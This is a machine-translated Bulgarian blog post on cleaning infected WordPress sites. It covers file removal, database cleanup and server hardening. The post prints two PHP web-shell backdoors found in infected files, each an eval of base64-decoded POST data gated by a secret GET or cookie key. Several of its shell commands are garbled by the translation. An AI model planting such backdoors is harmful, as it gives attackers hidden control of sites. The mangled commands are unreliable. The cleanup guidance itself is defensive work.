WordPress Exploit - почистване на заразени файлове, и SQL Server за сигурност.

Преди да прочетете този пост, трябва да видите , За да се разбере нещо. :)

Намерихме много от блогове на файлове stealthsettings.com, код, подобни на посочените по-долу, произтичащи от virusarii с WordPress използват.:

? <Php ако ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {Оценка (base64_decode ($ _ POST [ 'файл'])); изход; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcАко по-горе е за файла xmlrpc.php де ла Сънлив, На Впиши сървъра, изглежда като доста от този вид в изходни кодове.

pppffiuuu

Почистване на заразени файлове:

Ooookkkk ...
1. Най-доброто решение, тъй като това е направено резервно копиеИ да се почистват на базата данни е да се премахване файлове WordPress (Можете да запазите файла WP-config.php и не са строго свързани с WP платформа, след като внимателно провери) на сървъра и да направи първоначалната версия качване 2.5.1 (По този повод и да направи ъпгрейд версия WP :)) http://wordpress.org/download/ . Избършете включително тематични файлове, ако не вярваш, че си най-старателната проверка.

Изглежда, че са били засегнати и досиетата на теми, които не са били използвани преди в блога и просто смяна на темата, не решава проблема.

./andreea/wp-content/themes/default/index.php:<?php ако ($ _ COOKIE ['44e827f9fbeca184'] == "5cd3c94b4b1c57ea") {Оценка (base64_decode ($ _ POST ['File'])); изход; ??}> <Php get_header (); ?>

2. Търсене и изтриване на всички файлове, съдържащи:... * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и WP-info.txt файл, ако има такива.

Намери. -Name "* _new.php"
Намери. -Name "* _old.php"
Намери. -Име "*. Jpgg"
Намери. -Name "* _giff"
Намери. -Name "* _pngg"
Намери. -Name "WP-info.txt"

3. в / Tmp , Търсене и изтриване на папки като tmpYwbzT2

SQL чистене :

1. в Таблица Таблица wp_options Проверете и изтриване на редове: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Всички в wp_options, отидете на active_plugins и изтрийте, ако има плъгин, който завършва в една от разширения * _new.php, _old.php *, *. jpgg, *. giff, *. pngg или друг вътрешен съмнение, проверете внимателно.

3. В таблица wp_users, Да видим дали има потребител, който не е написал нищо в правото си, колоната user_nicename. Изтриване на потребител, но обърнете внимание на броя на ID колона. Този потребител може да използва "WordPress", както user_login е създаден и се появява на 00: 00: 00 0000-00-00.

4. Отиди до масата wp_usermeta и да изтриете всички линии, принадлежащи ID-горе.

След като сте направили това SQL почистване, забраните и след това позволи на някои плъгин. (В блога -> бордния -> Plugins)

Secure сървъра:

1. Вижте какво директории и файлове са "писане"(CHMOD 777) и се опитват да поставят на тях коригира че няма да позволи изписването им на всяко ниво. (CHMOD 644, например)

Намери. -Перм-2-LS

2. Вижте какви файлове има бит SUID или SGID . Ако не използвате тези файлове, сложи върху тях коригират 0 или деинсталиране на пакет, който тя съдържа. Те са много опасни, защото те изпълняват привилегии "група"Или"корен"Не и с нормални привилегии потребител да изпълни този файл.

Намери / тип F-къдрене-04000-LS
Намери / тип F-къдрене-02000-LS

3. Проверете кои портове са отворени и се опитайте да затворите или защитите тези, които не се използват.

NETSTAT-на | Впиши-и слушате

Толкова много. Виждам Google Search и други казват: "Ами те направиха!". Ами добре сте го направили ... но знаеш, че ако Google започва да се забрани всички сайтове формиране Е спам и сложи троянски коне (Trojan.Clicker.HTML) В бисквитки?

WordPress Exploit - почистване на заразени файлове, и SQL Server за сигурност.

За автора

Хитрост

Страстен за всичко, което приспособление и го напиша с удоволствие stealthsettings.com на 2006 и обичам да откривам нови неща с вас за компютри и MacOS, Linux, Windows, IOS и Android.

Как 1

Оставете коментар

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните за коментарите ви.